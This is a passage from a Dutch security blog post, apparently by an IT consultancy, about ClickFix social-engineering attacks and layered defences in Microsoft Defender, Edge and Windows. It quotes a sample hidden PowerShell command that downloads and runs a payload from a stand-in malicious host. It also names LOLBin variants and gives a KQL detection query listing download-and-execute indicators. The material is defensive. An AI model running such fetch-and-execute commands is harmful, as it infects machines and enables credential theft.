[{"data":1,"prerenderedAt":1121},["ShallowReactive",2],{"sc:header-data-nl":3,"sc:footer-data-nl":489,"author-nl-fritz-zurhorst-11e6a2cbe4b79b":519,"content-nl-fritz-zurhorst":543,"content-events-nl-fritz-zurhorst":1105,"authors_data:Fritz Zurhorst|Nadine Klein":1106},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"nl":13},{"title":14,"url":15,"alt":16},"Home","/nl","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"nl":21},{"title":22,"description":23},"Workplace","Slimme, veilige en flexibele werkplekken op basis van Microsoft 365, waarin moderne technologie en identiteitsdiensten samenkomen.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"nl":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"nl":34},{"title":35,"url":36},"Managed Intune","/nl/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"nl":40},{"title":41,"url":42},"Managed Entra","/nl/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"nl":46},{"title":47,"url":48},"Managed Workplace","/nl/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"nl":52},{"title":53,"url":54},"Consulting Services","/nl/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"nl":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"nl":64},{"title":65,"url":66},"Microsoft Entra Suite","/nl/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"nl":70},{"title":71,"url":72},"Microsoft Intune","/nl/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"nl":76},{"title":77,"url":78},"Microsoft Windows","/nl/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"nl":82},{"title":83,"url":84},"Windows 365 Cloud PC","/nl/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"nl":88},{"title":89,"url":90},"Cloud Workplace Foundation","/nl/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"nl":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"nl":100},{"title":101,"url":102},"Microsoft 365 Copilot","/nl/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"nl":106},{"title":107,"url":108},"Teams","/nl/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"nl":112},{"title":113,"url":114},"SharePoint & Power Platform","/nl/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"nl":118},{"title":119,"url":120},"Exchange Online","/nl/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"nl":124},{"title":125,"url":126},"Information Protection & Compliance","/nl/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"nl":130},{"title":131,"description":132},"Azure","Groeien met Azure: lagere cloudkosten, meer efficiëntie en ruimte voor innovatie met IaaS en PaaS.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"nl":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"nl":142},{"title":143,"url":144},"Azure Managed Services","/nl/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"nl":148},{"title":149,"url":150},"Azure Consulting","/nl/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"nl":154},{"title":155},"Scenario's",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"nl":160},{"title":161,"url":162},"Plan je cloud","/nl/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"nl":166},{"title":167,"url":168},"Migreren naar de cloud","/nl/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"nl":172},{"title":173,"url":174},"Vernieuw je business","/nl/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"nl":178},{"title":179,"url":180},"Herzie je VMware-strategie","/nl/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"nl":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"nl":190},{"title":191,"url":192},"Azure Foundation","/nl/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"nl":196},{"title":197,"url":198},"Azure AI Foundation","/nl/azure/azure-ai-foundation",{"name":86,"languages":200},{"nl":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"nl":205},{"title":206,"url":207},"Azure Data Foundation","/nl/azure/azure-data-foundation",{"name":188,"languages":209},{"nl":210},{"title":211,"url":212},"Azure Container Foundation","/nl/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"nl":216},{"title":217,"url":218},"Managed Dark Tenant","/nl/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"nl":222},{"title":223,"url":224},"Cloud Adoption Framework","/nl/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"nl":228},{"title":229,"url":230},"Cloud Competence Center","/nl/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"nl":234},{"title":235,"description":236,"emergency":237},"Security","Waakzaam in de cloud met een bekroonde 24/7 managed service, incident response en moderne bescherming van je infrastructuur.",{"text":238,"href":239,"skin":240,"icon":241},"Onder aanval?","/nl/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"nl":249},{"title":250,"url":251},"Managed Red Tenant","/nl/security/managed-red-tenant",{"name":214,"languages":253},{"nl":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"nl":259},{"title":260,"url":261},"Sentinel Data Lake","/nl/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"nl":265},{"title":266,"url":267},"Security Consulting","/nl/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"nl":274},{"title":275,"url":276},"Cloud Security Operations Center","/nl/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"nl":280},{"title":281,"url":282},"Global Secure Access","/nl/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"nl":286},{"title":287,"url":288},"MyWorkID","/nl/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"nl":295},{"title":296,"url":297},"Preventive Services","/nl/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"nl":301},{"title":302,"url":303},"Data Security Service","/nl/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"nl":307},{"title":308,"url":309},"Security Copilot Agents","/nl/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"nl":313},{"title":314,"url":315},"NIS2 implementeren","/nl/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"nl":319},{"title":320,"description":321},"Producten","Companion-producten voor een volledig beveiligde, 100% cloud-native Microsoft-omgeving die samenwerking, netwerkauthenticatie en softwarebeheer versterken.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"nl":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Softwaredistributie vanuit de cloud",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"nl":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Certificaatdistributie vanuit de cloud",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"nl":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Werk met je lokale Office 365-data",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"nl":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Migreer je data van de ene server naar de andere",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"nl":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider voor Microsoft 365",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"nl":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Authenticatie voor je netwerk",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"nl":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Contacten vinden in Microsoft Teams",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"nl":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot-monitoring in realtime",{"name":396,"languages":397},"casestudies",{"nl":398},{"title":399,"url":400,"description":401},"Case studies","/nl/casestudies","Pionier in de cloud: je Microsoft-partner voor doordachte cloudoplossingen met een blueprint-gebaseerde aanpak en expertise in Infrastructure-as-Code.",{"name":403,"languages":404,"children":407},"company",{"nl":405},{"title":406,"description":401},"Bedrijf",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"nl":411},{"title":412},"Over ons",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"nl":417},{"title":418,"url":419},"Facts & Figures","/nl/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"nl":423},{"title":424,"url":425},"Contact & locaties","/nl/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"nl":429},{"title":430,"url":431}," glueckkanja Zwitserland","/nl/company/switzerland",{"name":433,"languages":434},"austria",{"nl":435},{"title":436,"url":437},"glueckkanja Oostenrijk","/nl/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"nl":441},{"title":442},"Carrière",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"nl":447},{"title":448,"url":449},"Carrière-overzicht","/nl/career",{"name":451,"languages":452},"company-young-professionals",{"nl":453},{"title":454,"url":455},"Young Professionals","/nl/young-professionals",{"name":457,"languages":458},"company-jobs",{"nl":459},{"title":460,"url":461},"Vacatures","/nl/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"nl":465},{"title":466},"Actueel",[468,474],{"name":469,"languages":470},"company-blog",{"nl":471},{"title":472,"url":473},"Blog","/nl/blog",{"name":469,"languages":475},{"nl":476},{"title":477,"url":478},"Events","/nl/events",[480],{"name":481,"languages":482},"career-meta",{"nl":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"nl":487},{"title":488,"url":425,"active":484},"Contact",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksNl":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Privacy","/nl/privacy",{"title":514,"url":515},"Juridische informatie","/nl/imprint",{"title":517,"url":518},"Geen cookies","/nl/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":521,"navigation":325,"otherLanguages":535,"path":539,"seo":540,"stem":541,"__hash__":542},"authors/fritz-zurhorst.md","Fritz Zurhorst",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Friedemann Zurhorst ist Cyber Security Architect bei glueckkanja. Sein Schwerpunkt liegt auf Identity Security: Er prüft gewachsene Active-Directory-Umgebungen in AD Security Reviews, begleitet Kunden bei der Einführung starker Authentifizierung und klassifiziert Privilegien nach dem Enterprise Access Model, unter anderem in EntraOps-Workshops. Dazu kommen Platform Engineering und die Arbeit am Managed Red Tenant, mit dem glueckkanja Kunden eine sichere administrative Umgebung bereitstellt.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},{"en":536,"es":537,"ja":538},"Friedemann Zurhorst is a Cyber Security Architect at glueckkanja. His focus is identity security. He assesses grown Active Directory environments in AD security reviews, guides customers through the rollout of strong authentication, and classifies privileges along the Enterprise Access Model, among other things in EntraOps workshops. On top of that comes platform engineering as well as work on the Managed Red Tenant, with which glueckkanja provides customers with a secure administrative environment.","Friedemann Zurhorst es Cyber Security Architect en glueckkanja. Su especialidad es la seguridad de identidades. Evalúa entornos de Active Directory que han crecido con los años en AD Security Reviews, acompaña a los clientes en la implantación de una autenticación fuerte y clasifica los privilegios según el Enterprise Access Model, entre otros en los workshops de EntraOps. A ello se suman el platform engineering y el trabajo en el Managed Red Tenant, con el que glueckkanja proporciona a sus clientes un entorno administrativo seguro.","Friedemann Zurhorstは、glueckkanjaのCyber Security Architectです。専門はIdentity Securityで、AD Security Reviewでは長年かけて積み上がったActive Directory環境を点検し、強力な認証の導入をお客様とともに進め、EntraOpsワークショップなどでEnterprise Access Modelに沿って特権を分類しています。あわせてPlatform Engineeringと、glueckkanjaがお客様に安全な管理環境を提供するManaged Red Tenantの開発にも携わっています。","/fritz-zurhorst",{"title":521,"description":528},"fritz-zurhorst","GMLpRIZsG9AhXoKwTKoJSiKYi53_8VC070ybXAUDQK4",[544],{"id":545,"title":546,"author":547,"body":549,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1058,"meta":1059,"moment":1063,"navigation":325,"path":1097,"seo":1098,"stem":1099,"tags":1100,"webcast":484,"__hash__":1104},"content_nl/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Als de gebruiker de exploit is, en hoe jullie dat stoppen",[521,548],"Nadine Klein",{"type":523,"value":550,"toc":1047},[551,556,559,562,569,577,580,586,589,608,619,625,631,634,638,640,643,646,650,652,655,669,673,675,682,761,778,781,785,787,790,805,808,811,815,817,820,823,848,852,854,857,864,868,870,873,899,902,905,908,1007,1010,1013,1016,1027,1030,1034,1036,1043],[552,553,555],"h2",{"id":554},"de-clickfix-aanvalsketen","De ClickFix-aanvalsketen",[526,557,558],{},"{: .h3-font-size}",[526,560,561],{},"ClickFix is een aanval waarbij gebruikers hun eigen aanvaller worden. Geen exploit, geen kwetsbaarheid. Het slachtoffer voert de schadelijke code zelf uit, met één enkele copy-paste.",[526,563,564],{},[565,566],"img",{"alt":567,"src":568},"ClickFix-aanvalsketen in vijf stappen: het lokaas, de truc, copy-paste, uitvoering, infectie.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,570,571,572,576],{},"Het lokaas is social engineering: een vals CAPTCHA op een kwaadaardige pagina, een onjuiste supportmelding (\"je browser heeft een update nodig\"), een phishingmail of een valse meetingpagina. Terwijl het slachtoffer op de pagina is, schrijft JavaScript de payload via ",[573,574,575],"code",{},"clipboard.writeText()"," naar het klembord. Dan vraagt de pagina de gebruiker om Win+R, Ctrl+V en Enter te drukken. Het dialoogvenster Uitvoeren start wat er op het klembord staat.",[526,578,579],{},"Een typisch lokaas ziet er zo uit:",[526,581,582],{},[565,583],{"alt":584,"src":585},"Screenshot van een vals CAPTCHA-lokaas dat de gebruiker vraagt Win en X te drukken, dan te plakken en met Enter een commando uit te voeren.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,587,588],{},"Het commando dat het op het klembord zet, ziet er zo uit:",[590,591,593],"div",{"style":592},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[594,595,599],"pre",{"className":596,"code":597,"language":598,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[573,600,601],{"__ignoreMap":530},[602,603,606],"span",{"class":604,"line":605},"line",1,[602,607,597],{},[526,609,610,611,614,615,618],{},"Er gebeuren twee dingen tegelijk. PowerShell start in een verborgen venster (",[573,612,613],{},"-w h","), en ",[573,616,617],{},"iex(irm …)"," laadt de payload en voert die direct in het geheugen uit. Niets landt op de schijf, signatuurgebaseerde antivirus heeft dus niets om te scannen. De tweede stap is meestal een infostealer (Lumma, Vidar, RedLine, StealC), een remote access trojan of een ransomware-loader.",[526,620,621,622,624],{},"Hetzelfde patroon in de Microsoft-Defender-telemetrie, een verborgen PowerShell, gestart vanuit Windows Terminal, dat ",[573,623,617],{}," uitvoert:",[526,626,627],{},[565,628],{"alt":629,"src":630},"Microsoft-Defender-inspect-record met de procesketen WindowsTerminal.exe naar pwsh.exe naar powershell.exe, die een iex(irm …)-commando uitvoert.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,632,633],{},"Waarom dit zo goed werkt: alles draait in de gebruikerscontext, zonder verhoogde rechten. Cookies, opgeslagen wachtwoorden en sessietokens liggen binnen bereik van een standaardgebruiker. De aanvaller hoeft geen rechten te escaleren om bij dat te komen waarvoor hij is gekomen.",[552,635,637],{"id":636},"wat-microsoft-defender-detecteert","Wat Microsoft Defender detecteert",[526,639,558],{},[526,641,642],{},"Microsoft heeft de afgelopen maanden veel in de ClickFix-detectie geïnvesteerd. Als jullie Defender gezond en juist geconfigureerd is, krijgen jullie native detecties voor ClickFix-payloads. Sinds Q2 2025 publiceert MDE gedragsgebaseerde alerts onder titels als \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\" of \"An active 'Pacalau' malware in a command line was prevented from executing\". Ze vuren vanuit de MDE-cloud-engine via de analyse van de procesketen, parallel aan de AV-detectie en vaak een paar seconden eerder.",[526,644,645],{},"De configuratie die dat mogelijk maakt, staat verder naar onderen bij de hardening van de uitvoering.",[552,647,649],{"id":648},"waar-de-native-detectie-tegen-haar-grenzen-aanloopt","Waar de native detectie tegen haar grenzen aanloopt",[526,651,558],{},[526,653,654],{},"Cloudgebaseerde ML-signaturen hebben tijd nodig voordat ze afgaan. We zien regelmatig een gat van meer dan een minuut tussen de PowerShell-start en de Defender-alert. Een snellere payload glipt door dat venster.",[526,656,657,658,660,661,664,665,668],{},"Aanvallers passen zich bovendien snel aan. Ruil ",[573,659,598],{}," voor ",[573,662,663],{},"mshta http://..."," of ",[573,666,667],{},"msiexec /i http://...",", beide klassieke LOLBins, en de PowerShell-specifieke detecties grijpen niet meer.",[552,670,672],{"id":671},"het-gat-dichten-een-runmru-hunt","Het gat dichten: een RunMRU-hunt",[526,674,558],{},[526,676,677,678,681],{},"Dat gat dichten we met custom detections. Uitgangspunt is een KQL-query op de registry key ",[573,679,680],{},"RunMRU",", die elk commando meeschrijft dat een gebruiker in het Win+R-dialoogvenster typt.",[590,683,684],{"style":592},[594,685,689],{"className":686,"code":687,"language":688,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[573,690,691,696,701,707,713,719,725,731,737,743,749,755],{"__ignoreMap":530},[602,692,693],{"class":604,"line":605},[602,694,695],{},"DeviceRegistryEvents\n",[602,697,698],{"class":604,"line":531},[602,699,700],{},"| where ActionType =~ \"RegistryValueSet\"\n",[602,702,704],{"class":604,"line":703},3,[602,705,706],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[602,708,710],{"class":604,"line":709},4,[602,711,712],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[602,714,716],{"class":604,"line":715},5,[602,717,718],{},"| where RegistryValueData has \" ✅ \"\n",[602,720,722],{"class":604,"line":721},6,[602,723,724],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[602,726,728],{"class":604,"line":727},7,[602,729,730],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[602,732,734],{"class":604,"line":733},8,[602,735,736],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[602,738,740],{"class":604,"line":739},9,[602,741,742],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[602,744,746],{"class":604,"line":745},10,[602,747,748],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[602,750,752],{"class":604,"line":751},11,[602,753,754],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[602,756,758],{"class":604,"line":757},12,[602,759,760],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,762,763,764,767,768,767,771,767,774,777],{},"De query markeert elke Win+R-invoer die eruitziet als een ClickFix-commando: PowerShell, mshta, curl of msiexec samen met typische indicatoren als ",[573,765,766],{},"-w hidden",", ",[573,769,770],{},"iex",[573,772,773],{},"irm",[573,775,776],{},"DownloadString"," of Base64-gecodeerde payloads. Ze vangt ook de subtiele trucs. De groene vinkje-emoji die veel valse CAPTCHA-lokazen voor het commando zetten. Unicode-tekens uit cyrillische, Arabische of Thaise bereiken, waarmee aanvallers tekst camoufleren en eenvoudige stringfilters omzeilen. Duikt een van deze patronen op in een Win+R-invoer, dan loopt er zeer waarschijnlijk op dat moment een ClickFix-aanval.",[526,779,780],{},"Voor onze CSOC-klanten draaien we deze en verdere custom detections om het gat tussen nieuwe aanvalstechnieken en de ingebouwde detectie te dichten.",[552,782,784],{"id":783},"beschermingslaag-1-de-bezorging-blokkeren","Beschermingslaag 1: de bezorging blokkeren",[526,786,558],{},[526,788,789],{},"Nu naar de preventie. ClickFix is wijdverbreid en succesvol, één enkele bescherming volstaat dus niet. We werken in lagen, van de bezorging tot de uitvoering.",[526,791,792,793,796,797,800,801,804],{},"Network Protection blokkeert bekende delivery-domains en C2-servers voor alle browsers. MDE Web Content Filtering vult categorieën aan als \"Newly registered domains\", \"Hacking\" en \"Illegal Software\". Network Protection is in Windows ingebouwd, maar voor browsers van derden moeten jullie QUIC en ECH uitschakelen, omdat beide de complete verbinding versleutelen en het doeldomein verbergen. Schakel QUIC in Chrome en Firefox uit via enterprise policy (",[573,794,795],{},"QuicAllowed = Disabled"," in Chrome, ",[573,798,799],{},"network.http.http3.enable = false"," in Firefox); voor ECH zetten jullie in Chrome ",[573,802,803],{},"EncryptedClientHelloEnabled = Disabled",".",[526,806,807],{},"Voor Edge activeren jullie SmartScreen. Voor browsers van derden schakelen jullie hun ingebouwde Safe Browsing aan. Dat is niet hetzelfde als Network Protection, maar helpt bij het filteren van schadelijke pagina's. Voor de mailvector controleren Safe Links en Safe Attachments links en bijlagen voordat gebruikers ermee interacteren.",[526,809,810],{},"Het addertje: dat alles grijpt alleen tegen bekende infrastructuur. Actuele ClickFix-campagnes lopen via vers geregistreerde infrastructuur die te laat wordt geïdentificeerd en geblokkeerd, en soms via legitieme pagina's die een aanvaller heeft gecompromitteerd. Dus kijken we naar wat beschermt nadat het lokaas is bezorgd.",[552,812,814],{"id":813},"beschermingslaag-2-de-truc-blokkeren","Beschermingslaag 2: de truc blokkeren",[526,816,558],{},[526,818,819],{},"Een paar Edge-features verhogen de hindernis terwijl de gebruiker op een kwaadaardige pagina is. Het governen van browserextensies verhindert dat gebruikers kwaadaardige of gecompromitteerde extensies installeren die ClickFix-overlays binnensmokkelen of zelf het klembord manipuleren. De Edge Enhanced Security Mode legt strengere beschermingsmaatregelen op aan onbekende en zelden bezochte pagina's (JIT uitgeschakeld, Control Flow Guard, hardwaregesteunde stackbescherming), wat op exploits gebaseerde browserovernames duidelijk bemoeilijkt. Typo Protection waarschuwt voor typosquatted domains (micros0ft.com, paypa1.com) en blokkeert een wijdverbreide ClickFix-delivery-vector via valse merkdomeinen.",[526,821,822],{},"Technische controls zijn maar de helft van het werk. Voorlichting van gebruikers blijft beslissend. De ene regel die het grootste deel draagt: als een webpagina je vraagt om iets in je computer te plakken, is het een aanval. Maak dat in de awarenesstraining concreet:",[824,825,827,828,827,836,827,842],"ul",{"style":826},"margin: 0.25rem 0","\n  ",[829,830,831,835],"li",{},[832,833,834],"strong",{},"Echt lokaas laten zien:"," valse \"Verify you are human\"-checkboxen, \"je browser heeft een update nodig\", \"het document kon niet worden gerenderd, voer deze fix uit\", kapotte Teams- of Zoom-audioprompts.",[829,837,838,841],{},[832,839,840],{},"De klembordtruc voordoen:"," laten zien hoe de pagina het klembord stil overschrijft.",[829,843,844,847],{},[832,845,846],{},"Melden eenvoudig maken:"," snel en zonder schuldtoewijzing.",[552,849,851],{"id":850},"beschermingslaag-3-de-actie-blokkeren","Beschermingslaag 3: de actie blokkeren",[526,853,558],{},[526,855,856],{},"Hier zijn er een paar mogelijkheden om het systeem te hardenen, geen daarvan is een garantie. Begin met het uitschakelen van het dialoogvenster Uitvoeren, dat verwijdert het Win+R-instappunt. Microsofts ClickFix-guidance raadt aan het uit te schakelen \"where it isn't necessary\". Dat sluit de specifieke Win+R-paste-aanval, maar alternatieve startvlakken blijven, zoals de adresbalk van Explorer en Windows Terminal.",[526,858,859,860,863],{},"Jullie kunnen Edge aanvullend hardenen met ",[573,861,862],{},"DefaultClipboardSetting",", dat verhindert dat JavaScript stil naar het klembord schrijft.",[552,865,867],{"id":866},"beschermingslaag-4-de-uitvoering-blokkeren","Beschermingslaag 4: de uitvoering blokkeren",[526,869,558],{},[526,871,872],{},"Breng voor de gevorderde features de grondbeginselen in orde. Voor ClickFix betekent dat:",[824,874,827,875,827,881,827,887,827,893],{"style":826},[829,876,877,880],{},[832,878,879],{},"Local admin reduction:"," lokale administratorrechten waar mogelijk bij eindgebruikers verwijderen om de werking van een code-uitvoering te beperken.",[829,882,883,886],{},[832,884,885],{},"Endpoint Privilege Management (EPM):"," gebruikers als standaardgebruiker laten werken en alleen goedgekeurde apps via policyregels eleveren.",[829,888,889,892],{},[832,890,891],{},"UAC-hardening:"," secure-desktop-enforcement, promptgedrag voor admins en standaardgebruikers en installerdetectie controleren.",[829,894,895,898],{},[832,896,897],{},"Credential Guard:"," NTLM-hashes, Kerberos-tickets en overig credentialmateriaal via op virtualisatie gebaseerde beveiliging isoleren, zodat credentialdiefstal moeilijk blijft, zelfs wanneer een aanvaller adminrechten verkrijgt.",[526,900,901],{},"Deze controls beperken escalatiemogelijkheden, beschermen credentials en dwingen least privilege af. De grens daarbij: ze begrenzen wat er na een compromittering gebeurt. Ze houden een infostealer in de standaardgebruikerscontext er niet van af om voor de gebruiker leesbare cookies, sessietokens en 